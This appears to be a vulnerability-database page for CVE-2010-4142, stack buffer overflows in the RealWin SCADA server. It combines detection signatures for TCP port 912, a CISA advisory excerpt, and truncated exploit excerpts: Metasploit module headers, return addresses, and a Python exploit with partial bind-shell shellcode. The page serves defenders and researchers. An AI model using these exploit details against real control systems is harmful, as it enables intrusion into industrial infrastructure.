CVE-2010-4142
published 2010-11-02CVE-2010-4142: Multiple stack-based buffer overflows in DATAC RealWin 2.0 Build 6.1.8.10 and earlier allow remote attackers to cause a denial of service (crash) and possibly…
PriorityP266critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
63.57%
99.1th percentile
Multiple stack-based buffer overflows in DATAC RealWin 2.0 Build 6.1.8.10 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) SCPC_INITIALIZE, (2) SCPC_INITIALIZE_RF, or (3) SCPC_TXTEVENT packet. NOTE: it was later reported that 1.06 is also affected by one of these requests.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realflex | realwin | — | — |
| realflex | realwin | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
6a541264 00000002 00001ff4
bytes↗
6a541264 00000020 00001ff4
bytes↗
6a541264 00000010 00001ff4
bytes↗
\x64\x12\x54\x6A\x20\x00\x00\x00\xF4\x1F\x00\x00
- →Detect exploit attempts by monitoring TCP port 912 for packets whose first 4 bytes are \x64\x12\x54\x6A (magic header common to all three exploit variants) followed by a large payload (>200 bytes). ↗
- →SCPC_INITIALIZE packets are identified by the second DWORD value 0x00000002; SCPC_INITIALIZE_RF by 0x00000020; SCPC_TXTEVENT by 0x00000010 — all on TCP/912. ↗
- →Payloads for all three packet types include a third DWORD of 0x00001ff4 (8180 decimal), indicating a large declared data length — flag any TCP/912 connection with this value in bytes 8-11. ↗
- →The overflow is triggered via sprintf()/strcpy() with attacker-controlled data; monitor for connections to TCP/912 from external/untrusted hosts on RealWin SCADA servers. ↗
- →Bad characters in Metasploit payloads are \x00\x20\x0a\x0d — absence of these bytes in a large TCP/912 payload is consistent with shellcode delivery. ↗
- ·The Metasploit 'Universal' target RET addresses (0x4002da21 in FlexMLang.DLL 8.1.45.19, 0x4001f6d0/0x40017fc2) are version-specific; exploitation against other builds may require different gadgets. ↗
- ·RealWin 1.06 is also confirmed affected by at least one of the overflow variants (SCPC_INITIALIZE_RF packet type based on the exploit header), not only 2.0 Build 6.1.8.10. ↗
- ·No vendor fix was available at time of disclosure; detection and network-level blocking of TCP/912 from untrusted sources is the primary mitigation. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA ICS
GLEG Agora SCADA+ Exploit Pack
cisa_ics·2018-09-06
GLEG Agora SCADA+ Exploit Pack
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
GLEG Agora SCADA+ Exploit Pack
Last RevisedSeptember 06, 2018
Alert CodeICSA-11-096-01
## OVERVIEW
On March 15, 2011, GLEG Ltd. announced the Agora SCADA+ Exploit Pack for Immunity’s CANVAS system. CANVAS is a penetration testing framework that is extensible using CANVAS Exploit Packs. On March 25, 2011, GLEG announced it would be adding exploits for the 35 vulnerabilities released by Luigi Auriemma on March 21, 2011. The ICS-CERT has not received any reports of this tool being used for an unauthorized compromise of an actual control system installation.
ICS-CERT has prepared t
GHSA
GHSA-8v2j-5pqf-5p2c: Multiple stack-based buffer overflows in DATAC RealWin 2
ghsa_unreviewed·2022-05-17
CVE-2010-4142 [HIGH] CWE-119 GHSA-8v2j-5pqf-5p2c: Multiple stack-based buffer overflows in DATAC RealWin 2
Multiple stack-based buffer overflows in DATAC RealWin 2.0 Build 6.1.8.10 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) SCPC_INITIALIZE, (2) SCPC_INITIALIZE_RF, or (3) SCPC_TXTEVENT packet. NOTE: it was later reported that 1.06 is also affected by one of these requests.
No detection rules found.
Exploit-DB
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow (Metasploit)
exploitdb·2010-11-30
CVE-2010-4142 DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow (Metasploit)
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow (Metasploit)
---
##
# $Id: realwin_scpc_initialize.rb 11180 2010-11-30 20:19:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in DATAC Control
International RealWin SCADA Server 2.0 (Build 6.1.8.10).
By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
},
'Author' => [ 'Luigi Auriemma', '
Exploit-DB
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)
exploitdb·2010-11-30
CVE-2010-4142 DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)
---
##
# $Id: realwin_scpc_initialize_rf.rb 11180 2010-11-30 20:19:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in DATAC Control
International RealWin SCADA Server 2.0 (Build 6.1.8.10).
By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
},
'Author' => [ 'Luigi Aur
Exploit-DB
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)
exploitdb·2010-11-24
CVE-2010-4142 DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)
---
##
# $Id: realwin_scpc_txtevent.rb 11125 2010-11-24 13:44:46Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in DATAC Control
International RealWin SCADA Server 2.0 (Build 6.1.8.10).
By sending a specially crafted packet,
an attacker may be able to execute arbitrary code.
},
'Author' => [ 'Luigi Auriemma', 'MC' ],
'L
Exploit-DB
DATAC RealWin SCADA Server 1.06 - Remote Buffer Overflow
exploitdb·2010-10-27
CVE-2010-4142 DATAC RealWin SCADA Server 1.06 - Remote Buffer Overflow
DATAC RealWin SCADA Server 1.06 - Remote Buffer Overflow
---
# Exploit Title: RealWin SCADA System SEH Overwrite
# Date: 10-27-10
# Author: Blake
# Software Link: http://www.realflex.com/products/realwin/realwin.php
# Version: 1.06
# Tested on: Windows XP SP3 running in VMware Workstation (rfx)
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s \n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 912 by default
# windows/shell_bind_tcp - 368 bytes Encoder: x86/shikata_ga_nai
# LPORT=4444,
shellcode =(
"\xba\xe7\x26\x3b\xa1\x33\xc9\xb1\x56\xdb\xce\xd9\x74\x24\xf4"
"\x5d\x83\xc5\x04\x31\x55\x0b\x03\x55\xec\xc4\xce\x5d\x1a\x81"
"\x31\x9e\xda\xf2\xb8\x7b\xeb\x20\xde\x08\x59\xf5\x94\x5d\x51"
"\x7e\xf8\x75\xe2\xf2\xd5\x7a\x43\xb8\x03\xb4\x54\x0c\x8c\
Exploit-DB
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow
exploitdb·2010-10-15
CVE-2010-4142 DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow
---
Source: http://aluigi.org/adv/realwin_1-adv.txt
#######################################################################
Luigi Auriemma
Application: DATAC RealWin
http://www.dataconline.com/software/realwin.php
http://www.realflex.com
Versions: <= 2.0 (Build 6.1.8.10)
Platforms: Windows
Bugs: A] stack overflow in SCPC_INITIALIZE and SCPC_INITIALIZE_RF
B] stack overflow in SCPC_TXTEVENT
Exploitation: remote, versus server
Date: 15 Oct 2010
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
1) Introduction
"Re
Metasploit
DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow
metasploit
DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow
DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow
This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.1.8.10). By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
Metasploit
DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow
metasploit
DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow
DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow
This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.1.8.10). By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
Metasploit
DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow
metasploit
DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow
DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow
This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.1.8.10). By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
http://aluigi.org/adv/realwin_1-adv.txthttp://secunia.com/advisories/41849http://www.exploit-db.com/exploits/15259http://www.exploit-db.com/exploits/15337http://www.securityfocus.com/bid/44150http://aluigi.org/adv/realwin_1-adv.txthttp://secunia.com/advisories/41849http://www.exploit-db.com/exploits/15259http://www.exploit-db.com/exploits/15337http://www.securityfocus.com/bid/44150
2010-11-02
Published